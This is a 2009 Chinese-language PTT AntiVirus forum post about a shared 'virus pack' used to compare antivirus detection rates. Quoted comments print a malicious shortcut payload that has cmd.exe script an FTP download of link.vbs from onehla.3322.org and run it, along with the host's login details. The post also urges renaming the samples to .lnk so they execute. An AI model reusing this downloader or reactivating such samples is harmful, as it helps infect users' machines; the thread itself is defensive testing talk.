Re: [推薦] 病毒包又來了！！！

看板AntiVirus (防毒)作者TypeZero (TypeZero)時間16年前 (2009/01/30 18:45)推噓5(5推 0噓 11→)

留言16則, 4人參與討論串7/8 (看更多)

: -- : ※ 發信站: 批踢踢實業坊(ptt.cc) : ◆ From: 59.112.10.194 : 推 pgpayton:D+ 預設情況下早已將windows重要的資料夾加入保護 01/30 13:06 : → pgpayton:未經授權的程序是不容許竄改的防火牆沒必要關閉吧 01/30 13:10 : → pgpayton:因為Ftp.exe要往外連會有提示我測的結果是lnk都無效 01/30 13:11 : → pgpayton:不然請您把有效的lnk丟給我 01/30 13:12 : → miamodo:@@刺套跳蛋@@.download,更改副檔名為lnk 01/30 14:51 : → miamodo:查一下computer security plolicy內cmd.exe的規則… 01/30 14:51 : → miamodo:如果fd阻止t.t及link.vbs的創建,就不能測試了 01/30 14:51 : → miamodo:很久沒有使用defense wall了,不了解它在情形如何… 01/30 14:52 : → miamodo:以下是跳蛋其中一段 01/30 14:53 : → miamodo:%windir%\system32\cmd.exe 01/30 14:53 : → miamodo:/c echo open onehla.3322.org >t.t&echo 123>>t.t&echo 01/30 14:54 : → miamodo:get 1-1 %windir%\link.vbs>>t.t&echo bye>>t.t&ftp -s: 01/30 14:55 : → miamodo:t.t&del t.t&start %windir%\link.vbs& 01/30 14:55 : → miamodo:%windir%\system32\cmd.exe 01/30 14:56 : → miamodo:15-1645522239-1606980848-500_CLASSES 01/30 14:56 : → miamodo:Lucida Console 01/30 14:57 : → miamodo:其實也不必去run,在網址列輸入ftp:\\onehla.3322.org 01/30 14:59 : → miamodo:輸入username:123,password:123,也可下載.... 01/30 15:01 : 推 pgpayton:D+ fd預設根本沒設cmd.exe的規則有設的話此病毒包的病毒 01/30 16:00 : → pgpayton:大部分都沒辦法執行另外為啥要改副檔名? 我是指原本病毒 01/30 16:01 : → pgpayton:包的lnk檔那些download檔我點擊也都是沒任何事發生 01/30 16:03 : → pgpayton:download檔我就沒每個試 01/30 16:04 : → miamodo:computer security plolicy->AD 01/30 16:34 : → miamodo:原Po已說過download檔是lnk檔.... 01/30 16:35 : 推 pgpayton:AD沒設cmd的規則阿另外要改副檔名才能執行病毒那就跟 01/30 16:53 : → pgpayton:防毒軟體的隔離差不多了也就是使用者誤點也無法執行 01/30 16:54 : → miamodo:如果您未曾設cmd規則,在執行lnk檔時,在paranoid模式下 01/30 17:10 : → miamodo:應會出現explorer.exe excute cmd.exe的詢問視窗 01/30 17:11 : → miamodo:所以您說d+無反應,個人才會不解.... 01/30 17:12 : → miamodo:另外您說的沒錯副檔名download是不能直接在雙擊執行的.. 01/30 17:12 : 推 TypeZero:這是因為google瀏覽器會自動改副檔名... 01/30 17:23 : 推 pgpayton:explorer.exe excute cmd.exe? 我是執行lnk檔並不是cmd 01/30 17:24 : → pgpayton:如果改成無法執行的副檔名那也就不能怪防毒的偵測率低弱 01/30 17:25 : → miamodo:謝謝T大的說明... 01/30 17:27 : 推 pgpayton:也不是說D+無反應因為explorer.exe是執行某檔案D+會出現 01/30 17:28 : → pgpayton:的正常提示我應該改成D+無偵測到可疑行為 01/30 17:29 : → miamodo:謝謝p大的說明,這病毒包讓我又學到很多東西,感謝... 01/30 17:32 : → miamodo:為了安全起見建議p大將cmd,ntvdm,?script等列入黑名單.. 01/30 17:38 : 推 pgpayton:感謝你的好意不過我電腦並沒裝comodo.. 01/30 17:41 : 推 pgpayton:另外請教T大為何有的會改成無效的副檔名? 有的不會? 01/30 18:03 防毒軟體的偵測應該跟副檔名沒有關係吧... 主要是判定該檔案具有威脅性再說，竟然有防毒軟體可以偵測，為什麼某些防毒軟體不能希望不要再為特定防毒軟體過度保護，這樣不能讓一個防毒廠商成長只是助長病毒讓病毒更加氾濫，使用者也不一定要一直用同一套防毒軟體雖然說升級的費用較便宜，但是如果病毒造成無法挽回的後果那就糟了比如說阿宅珍藏的釘宮理惠配音的動畫被刪光（不要在意那四個字＝＝）類似這樣的事情多得不償失呀！所以防毒軟體要做到的是萬全的防護，而不是針對特定副檔名的防護因為如果分成兩段式，利用一個exe檔去指令執行某個亂七八糟副檔名的檔案這樣不就中鏢了？我個人認為應該是沒有這樣的問題，希望有人能幫忙測試那些效能低落的防毒軟體將我發的病毒包*.download檔案，利用批量重新命名改成*.lnk 測試看看是否有改變，基本上應該是不會改變的 lnk連結失效，但是kis還是可以偵測，所以這應該跟失不失效沒關係 -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 114.46.167.126